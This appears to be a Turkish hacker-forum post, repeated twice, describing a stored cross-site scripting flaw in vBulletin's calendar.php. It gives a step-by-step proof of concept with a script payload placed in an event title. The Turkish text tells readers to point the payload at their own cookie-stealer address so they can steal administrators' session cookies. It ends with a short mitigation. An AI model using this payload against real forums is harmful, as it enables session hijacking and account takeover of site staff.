09'
Tasarım
HaCKer'Mys
Hacker
vBulletin 3.6.X XSS Acıgı
Vbulletinlerde sok bir acık daha xss acıgı cıkmıs bulunmakta ve sızlere turkce olarak anlatıyım.
Englısh
vendor site: face=courier new, courier, mono http://www.vbulletin.com/
product:vbulletin < 3.6.6
bug: permanent xss
affected file: calendar.php
risk : medium
xss permanent ( must be loggued ) PoC :
face=courier new, courier, mono http://127.0.0.1/vbulletin/calendar....ype=single&c=1
--> fill up the title field with :
</title><script>alert(document.******)</script>
Event Date : ( some far away date ... like 2010 for exemple )
message : whatever .
when it’s done look at the :"Request Reminder for this Event" link.
(it looks like this: face=courier new, courier, mono http://127.0.0.1/vbulletin/calendar....ddreminder&e=2
if you click,your XSS will be executed .
reminder:
permanent xss are dangerous ...
see : face=courier new, courier, mono http://en.wikipedia.org/wiki/Cross_site_scripting
Turkce
site.com/forum_klasoru/calendar.php?do=add&type=si ngle&c=1 Linkine gırıyoruz.Sonra olay düzenleme ya da olay eklemeden baslıga su kodu yazıyoruz tabı bunu snıffer yanı ****** calıcı adresınıze gore duzenleyın.
Kod:
</title><script>alert(document.******)</script>
anasayfada kım onlıne ıse admın ve yetkılı kısılerın cookileri calınabiliyor.
Acıgı kapatmak icin ;
Vbulletin Seceneklerden Takvimi Kapatmak Genel Ayarlardan Veya;
Tum Kullanıcı Gruplarına takvim gorunumu yasaklayınız.Kolay Gelsın..
Englısh
vendor site: face=courier new, courier, mono http://www.vbulletin.com/
product:vbulletin < 3.6.6
bug: permanent xss
affected file: calendar.php
risk : medium
xss permanent ( must be loggued ) PoC :
face=courier new, courier, mono http://127.0.0.1/vbulletin/calendar....ype=single&c=1
--> fill up the title field with :
</title><script>alert(document.******)</script>
Event Date : ( some far away date ... like 2010 for exemple )
message : whatever .
when it’s done look at the :"Request Reminder for this Event" link.
(it looks like this: face=courier new, courier, mono http://127.0.0.1/vbulletin/calendar....ddreminder&e=2
if you click,your XSS will be executed .
reminder:
permanent xss are dangerous ...
see : face=courier new, courier, mono http://en.wikipedia.org/wiki/Cross_site_scripting
Turkce
site.com/forum_klasoru/calendar.php?do=add&type=si ngle&c=1 Linkine gırıyoruz.Sonra olay düzenleme ya da olay eklemeden baslıga su kodu yazıyoruz tabı bunu snıffer yanı ****** calıcı adresınıze gore duzenleyın.
Kod:
</title><script>alert(document.******)</script>
anasayfada kım onlıne ıse admın ve yetkılı kısılerın cookileri calınabiliyor.
Acıgı kapatmak icin ;
Vbulletin Seceneklerden Takvimi Kapatmak Genel Ayarlardan Veya;
Tum Kullanıcı Gruplarına takvim gorunumu yasaklayınız.Kolay Gelsın..